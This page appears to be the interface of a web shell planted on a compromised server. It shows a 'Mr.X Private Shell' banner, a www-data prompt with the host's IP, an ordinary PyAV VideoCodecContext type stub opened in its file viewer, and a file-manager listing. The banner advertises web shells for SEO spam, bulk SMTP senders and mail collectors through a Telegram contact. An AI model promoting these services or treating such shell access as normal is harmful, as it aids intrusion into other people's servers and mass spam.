__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.217.30: ~ $
from fractions import Fraction
from typing import Iterator, Literal

from av.codec.context import CodecContext
from av.packet import Packet

from .format import VideoFormat
from .frame import VideoFrame

class VideoCodecContext(CodecContext):
    format: VideoFormat | None
    width: int
    height: int
    bits_per_coded_sample: int
    pix_fmt: str | None
    framerate: Fraction
    rate: Fraction
    gop_size: int
    sample_aspect_ratio: Fraction | None
    display_aspect_ratio: Fraction | None
    has_b_frames: bool
    max_b_frames: int
    coded_width: int
    coded_height: int
    color_range: int
    color_primaries: int
    color_trc: int
    colorspace: int
    qmin: int
    qmax: int
    type: Literal["video"]

    def encode(self, frame: VideoFrame | None = None) -> list[Packet]: ...
    def encode_lazy(self, frame: VideoFrame | None = None) -> Iterator[Packet]: ...
    def decode(self, packet: Packet | None = None) -> list[VideoFrame]: ...

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.pxd File 0 B 0644
__init__.py File 62 B 0644
__init__.pyi File 103 B 0644
codeccontext.cpython-313-aarch64-linux-gnu.so File 133.88 KB 0644
codeccontext.pxd File 1.04 KB 0644
codeccontext.pyi File 968 B 0644
codeccontext.pyx File 10.57 KB 0644
format.cpython-313-aarch64-linux-gnu.so File 136.57 KB 0644
format.pxd File 727 B 0644
format.pyi File 775 B 0644
format.pyx File 5.8 KB 0644
frame.cpython-313-aarch64-linux-gnu.so File 393.54 KB 0644
frame.pxd File 621 B 0644
frame.pyi File 2.19 KB 0644
frame.pyx File 29.07 KB 0644
plane.cpython-313-aarch64-linux-gnu.so File 69.12 KB 0644
plane.pxd File 193 B 0644
plane.pyi File 223 B 0644
plane.pyx File 1.26 KB 0644
reformatter.cpython-313-aarch64-linux-gnu.so File 133.16 KB 0644
reformatter.pxd File 373 B 0644
reformatter.pyi File 1.35 KB 0644
reformatter.pyx File 8.22 KB 0644
stream.cpython-313-aarch64-linux-gnu.so File 133.27 KB 0644
stream.pxd File 209 B 0644
stream.pyi File 1.16 KB 0644
stream.pyx File 3.57 KB 0644
Filemanager